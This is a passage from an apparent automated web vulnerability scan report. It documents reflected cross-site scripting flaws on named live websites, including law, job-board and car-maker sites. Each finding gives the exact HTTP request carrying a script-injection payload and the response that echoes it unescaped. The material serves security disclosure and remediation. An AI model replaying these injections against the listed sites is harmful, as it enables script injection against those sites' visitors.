
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=42197fb2"><script>alert(1)</script>3bad20cc3eb HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:24 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000G1_JrXVYveRAbSxDcQP-B9h:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=70
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:28 GMT;path=/
Content-Length: 58296


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="#"    onclick="toggleDisplayId('save');_gaq.push(['_trackEvent', 'vault.com tools', 'save', 'http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=42197fb2"><script>alert(1)</script>3bad20cc3eb']);">
...[SNIP]...

3.136. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5616"><script>alert(1)</script>41dece5dd80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?d5616"><script>alert(1)</script>41dece5dd80=1 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:17 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000sVZxJy0CmQsFdXIQLzrOsAU:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=41
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:20 GMT;path=/
Content-Length: 67435


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="#"    onclick="toggleDisplayId('save');_gaq.push(['_trackEvent', 'vault.com tools', 'save', 'http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?d5616"><script>alert(1)</script>41dece5dd80=1']);">
...[SNIP]...

3.137. http://www.velaw.com/offices/offices.aspx [ctl00%24txtboxSearch parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.velaw.com
Path:   /offices/offices.aspx

Issue detail

The value of the ctl00%24txtboxSearch request parameter is copied into an HTML comment. The payload 405fd-->db11da91753 was submitted in the ctl00%24txtboxSearch parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /offices/offices.aspx HTTP/1.1
Host: www.velaw.com
Proxy-Connection: keep-alive
Referer: http://www.velaw.com/offices/offices.aspx
Cache-Control: max-age=0
Origin: http://www.velaw.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45
Content-Length: 6790

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUIOTYxNDU2ODYPZBYCZg9kFgICAxBkZBYCAgEPZBYCAgEPZBYCAgMPZBYCAgcPZBYGAgEPDxYCHgRUZXh0BQdPZmZpY2VzZGQCAw8PFgIeBVRpdGxlBQEgZGQCBQ8PFgIfAAXyIjxUQUJMRSBib3
...[SNIP]...
%2BG1taFSSMCpm066tP5g%3D&__EVENTVALIDATION=%2FwEWDALagtuGBgKejOLuAgLs5fqeCgLz5fqeCgLy5fqeCgLx5fqeCgLw5fqeCgL35fqeCgL25fqeCgL15fqeCgKx3o%2BTDAKns8rnDiPy1LpQsocHPUGsrbmuTCDxeOCY&ctl00%24txtboxSearch=%27405fd-->db11da91753&ctl00%24ddl_Search=0&ctl00%24btnGo=Go&ctl00%24ContentPlaceHolder_Body%24ListSummaryOffice%24ctl00%24ContentPlaceHolder_Body%24ListSummaryOfficeEktronClientManager=EktronJS%2CEktronThickBoxJS%2CEktron
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:33:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Vinson &
...[SNIP]...
<input name="ctl00$ContentPlaceHolder_Body$txtboxSearch" type="text" value="'405fd-->db11da91753" id="ctl00_ContentPlaceHolder_Body_txtboxSearch" class="SiteSearch" style="width:130px;left: 199px" />
...[SNIP]...

3.138. http://www.velaw.com/search/search_result.aspx [searchtext parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.velaw.com
Path:   /search/search_result.aspx

Issue detail

The value of the searchtext request parameter is copied into an HTML comment. The payload 892c0-->b7aa13ac6c3 was submitted in the searchtext parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /search/search_result.aspx?searchtext='892c0-->b7aa13ac6c3&section=0 HTTP/1.1
Host: www.velaw.com
Proxy-Connection: keep-alive
Referer: http://www.velaw.com/offices/offices.aspx
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:34:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Vinson &
...[SNIP]...
<input name="ctl00$ContentPlaceHolder_Body$txtboxSearch" type="text" value="'892c0-->b7aa13ac6c3" id="ctl00_ContentPlaceHolder_Body_txtboxSearch" class="SiteSearch" style="width:130px;left: 199px" />
...[SNIP]...

3.139. http://www.velaw.com/workarea/csslib/ektronCss.ashx [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.velaw.com
Path:   /workarea/csslib/ektronCss.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 41425<script>alert(1)</script>0ea1ee155f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/csslib/ektronCss.ashx?id=EktronThickBoxCss+EktronBubbleCss+EktronModalCss41425<script>alert(1)</script>0ea1ee155f HTTP/1.1
Host: www.velaw.com
Proxy-Connection: keep-alive
Referer: http://www.velaw.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:32:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=31536000
Expires: Sat, 21 Jan 2012 18:32:25 GMT
Last-Modified: Fri, 21 Jan 2011 18:32:25 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 6917

#Ekt_AjaxContent{padding:0;margin:0;}#EkTB_secondLine{font:10px Arial,Helvetica,sans-serif;color:#666;}#EkTB_window a:link{color:#666;}#EkTB_window a:visited{color:#666;}#EkTB_window a:hover{color:#00
...[SNIP]...
l('/WorkArea/images/application/bubble/bott.gif');}

/* ############################################################# */
/* ektron registered stylesheet: css file not found */
/* id: EktronModalCss41425<script>alert(1)</script>0ea1ee155f */
/* path:
/* ############################################################# */


3.140. http://www.velaw.com/workarea/java/ektronJs.ashx [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.velaw.com
Path:   /workarea/java/ektronJs.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 87cde<script>alert(1)</script>82c5bf98272 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/java/ektronJs.ashx?id=EktronWebToolBarJS87cde<script>alert(1)</script>82c5bf98272 HTTP/1.1
Host: www.velaw.com
Proxy-Connection: keep-alive
Referer: http://www.velaw.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:31:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=31536000
Expires: Sat, 21 Jan 2012 18:31:09 GMT
Last-Modified: Fri, 21 Jan 2011 18:31:09 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 266

//################################################################
//ektron registered javascript: js file not found
//id: EktronWebToolBarJS87cde<script>alert(1)</script>82c5bf98272
//path:
//################################################################


3.141. http://www.veterinarycrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veterinarycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 757dc"><script>alert(1)</script>3bca8978ac9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?757dc"><script>alert(1)</script>3bca8978ac9=1 HTTP/1.1
Host: www.veterinarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:53 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=c8n3ncns7ht7t0si0k3dgtk073; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 96306

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.veterinarycrossing.com/?757dc"><script>alert(1)</script>3bca8978ac9=1">
...[SNIP]...

3.142. http://www.volunteercrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.volunteercrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c91"><script>alert(1)</script>558fd7307bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f3c91"><script>alert(1)</script>558fd7307bc=1 HTTP/1.1
Host: www.volunteercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:28 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gsjp47s81aiji0u54k67gabll2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109157

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.volunteercrossing.com/?f3c91"><script>alert(1)</script>558fd7307bc=1">
...[SNIP]...

3.143. http://www.workathomecrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.workathomecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ea6"><script>alert(1)</script>4ebf1ff23b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?21ea6"><script>alert(1)</script>4ebf1ff23b7=1 HTTP/1.1
Host: www.workathomecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:45 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vppakdfp3q5re522ilii6gj224; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:45 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117823

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.workathomecrossing.com/?21ea6"><script>alert(1)</script>4ebf1ff23b7=1">
...[SNIP]...

3.144. http://www.writingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.writingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad0d9"><script>alert(1)</script>4355e2650f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ad0d9"><script>alert(1)</script>4355e2650f=1 HTTP/1.1
Host: www.writingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:05 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=slji4fnof2adg25ahsbg5ats32; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113221

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.writingcrossing.com/?ad0d9"><script>alert(1)</script>4355e2650f=1">
...[SNIP]...

3.145. http://www.bcgsearch.com/searchresults.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bcgsearch.com
Path:   /searchresults.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e193"><script>alert(1)</script>73375c8c0c7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /searchresults.php?key=OP3V61427 HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2e193"><script>alert(1)</script>73375c8c0c7

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=p8tpdlaudtgnv3nbu08cvm6rl5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: BCGJOB_61427=61427; expires=Sat, 05-Feb-2011 19:35:18 GMT; domain=bcgsearch.com
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37779

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Employment Attorney, Employment Lawyer Jobs, San Francisco, California - 61
...[SNIP]...
<input type="hidden" name="clscandidateinfo_refferalurl" value="http://www.google.com/search?hl=en&q=2e193"><script>alert(1)</script>73375c8c0c7">
...[SNIP]...

3.146. http://www.bmwusa.com/jsenvconst.ashx [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /jsenvconst.ashx

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a9f9"-alert(1)-"b61067d8f0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsenvconst.ashx HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Referer: http://www.bmwusa.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.106a9f9"-alert(1)-"b61067d8f0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; NSC_CNX_21529_64.29.204.16=4f52b42b3660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:27:16 GMT
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:47:16 GMT;path=/
Content-Length: 663

var WEBSITE_URL = "www.bmwusa.com";
var WEB_SERVICES_URL = "ws.bmwusa.com";
var WCF_SERVICES_URL = "ws.bmwusa.com";
var RESOURCE_SERVER_URL = "cache.bmwusa.com";
var MOBILE_URL = "m.bmwusa.com";

...[SNIP]...
